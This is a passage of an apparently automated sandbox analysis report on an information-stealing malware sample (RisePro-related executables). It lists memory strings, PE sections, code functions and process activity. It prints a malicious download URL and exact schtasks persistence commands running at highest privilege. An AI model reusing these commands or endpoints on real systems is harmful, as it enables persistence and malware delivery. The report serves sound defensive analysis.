            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
            Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
            Source: SciTE.exe.4.drString found in binary or memory: http://www.activestate.com
            Source: SciTE.exe.4.drString found in binary or memory: http://www.activestate.comHolger
            Source: SciTE.exe.4.drString found in binary or memory: http://www.baanboard.com
            Source: SciTE.exe.4.drString found in binary or memory: http://www.baanboard.comBrendon
            Source: SciTE.exe.4.drString found in binary or memory: http://www.develop.com
            Source: SciTE.exe.4.drString found in binary or memory: http://www.develop.comDeepak
            Source: SciTE.exe.4.drString found in binary or memory: http://www.lua.org
            Source: SciTE.exe.4.drString found in binary or memory: http://www.rftp.com
            Source: SciTE.exe.4.drString found in binary or memory: http://www.rftp.comJosiah
            Source: SciTE.exe.4.drString found in binary or memory: http://www.scintilla.org
            Source: SciTE.exe.4.drString found in binary or memory: http://www.scintilla.org/scite.rng
            Source: SciTE.exe.4.drString found in binary or memory: http://www.spaceblue.com
            Source: SciTE.exe.4.drString found in binary or memory: http://www.spaceblue.comMathias
            Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.000000000105D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000002.3734938152.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
            Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT%
            Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTv
            Source: SciTE.exe.4.drString found in binary or memory: https://www.smartsharesystems.com/
            Source: SciTE.exe.4.drString found in binary or memory: https://www.smartsharesystems.com/Morten
            Source: SciTE.exe.4.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_f59074ed-0

            System Summary

            barindex
            Source: hunta[1].exeStatic PE information: section name:
            Source: hunta[1].exeStatic PE information: section name: .idata
            Source: hunta[1].exeStatic PE information: section name:
            Source: RageMP131.exe.2.drStatic PE information: section name:
            Source: RageMP131.exe.2.drStatic PE information: section name: .idata
            Source: RageMP131.exe.2.drStatic PE information: section name:
            Source: MPGPH131.exe.2.drStatic PE information: section name:
            Source: MPGPH131.exe.2.drStatic PE information: section name: .idata
            Source: MPGPH131.exe.2.drStatic PE information: section name:
            Source: MyProg.exe.4.drStatic PE information: section name: Y|uR
            Source: WwKLWFk.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\hunta[1].exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F048702_2_00F04870
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00E820402_2_00E82040
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F0B8002_2_00F0B800
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00E9A1002_2_00E9A100
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00E822C02_2_00E822C0
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00E942A02_2_00E942A0
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F603A02_2_00F603A0
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00EF03802_2_00EF0380
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00E8AB502_2_00E8AB50
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F63B282_2_00F63B28
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F5A4502_2_00F5A450
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F015902_2_00F01590
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F6956F2_2_00F6956F
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00E8A7202_2_00E8A720
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_002160764_2_00216076
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_00216D004_2_00216D00
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_0038B80014_2_0038B800
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_0038487014_2_00384870
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_0030204014_2_00302040
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_0031A10014_2_0031A100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_003142A014_2_003142A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_003022C014_2_003022C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_003E3B2814_2_003E3B28
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_0030AB5014_2_0030AB50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_003E03A014_2_003E03A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_0037038014_2_00370380
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_003DA45014_2_003DA450
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_003E956F14_2_003E956F
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_0038159014_2_00381590
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_0030A72014_2_0030A720
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_0038B80015_2_0038B800
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_0038487015_2_00384870
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_0030204015_2_00302040
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_0031A10015_2_0031A100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_003142A015_2_003142A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_003022C015_2_003022C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_003E3B2815_2_003E3B28
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_0030AB5015_2_0030AB50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_003E03A015_2_003E03A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_0037038015_2_00370380
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_003DA45015_2_003DA450
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_003E956F15_2_003E956F
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_0038159015_2_00381590
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_0030A72015_2_0030A720
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_002FB80021_2_002FB800
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_002F487021_2_002F4870
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_0027204021_2_00272040
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_0028A10021_2_0028A100
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_002842A021_2_002842A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_002722C021_2_002722C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_00353B2821_2_00353B28
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_0027AB5021_2_0027AB50
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_003503A021_2_003503A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_002E038021_2_002E0380
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_0034A45021_2_0034A450
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_0035956F21_2_0035956F
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_002F159021_2_002F1590
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_0027A72021_2_0027A720
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B5607622_2_00B56076
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B56D0022_2_00B56D00
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_002FB80024_2_002FB800
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_002F487024_2_002F4870
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_0027204024_2_00272040
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_0028A10024_2_0028A100
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_002842A024_2_002842A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_002722C024_2_002722C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_00353B2824_2_00353B28
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_0027AB5024_2_0027AB50
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_003503A024_2_003503A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_002E038024_2_002E0380
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_0034A45024_2_0034A450
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_0035956F24_2_0035956F
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_002F159024_2_002F1590
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_0027A72024_2_0027A720
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: String function: 003DD590 appears 46 times
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: String function: 0034D590 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
            Source: MyProg.exe.4.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: hunta[1].exe, 00000002.00000003.1321581799.0000000005BCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
            Source: hunta[1].exe, 00000002.00000003.1322295794.0000000005BC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
            Source: hunta[1].exe, 00000002.00000002.3743392087.0000000005710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
            Source: hunta[1].exe, 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
            Source: hunta[1].exeBinary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
            Source: hunta[1].exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: WwKLWFk.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: WwKLWFk.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: WwKLWFk.exe.2.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: hunta[1].exeStatic PE information: Section: ZLIB complexity 0.9998547544838146
            Source: RageMP131.exe.2.drStatic PE information: Section: ZLIB complexity 0.9998547544838146
            Source: MPGPH131.exe.2.drStatic PE information: Section: ZLIB complexity 0.9998547544838146
            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@28/31@1/2
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_0021119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,4_2_0021119F
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B5119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,22_2_00B5119F
            Source: C:\Users\user\Desktop\hunta[1].exeFile created: C:\Users\user\AppData\Local\RageMP131Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7456
            Source: C:\Users\user\Desktop\hunta[1].exeFile created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: hunta[1].exeReversingLabs: Detection: 94%
            Source: hunta[1].exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: RageMP131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: RageMP131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\hunta[1].exeFile read: C:\Users\user\Desktop\hunta[1].exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\hunta[1].exe "C:\Users\user\Desktop\hunta[1].exe"
            Source: C:\Users\user\Desktop\hunta[1].exeProcess created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
            Source: C:\Users\user\Desktop\hunta[1].exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hunta[1].exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
            Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hunta[1].exeProcess created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exeJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHESTJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
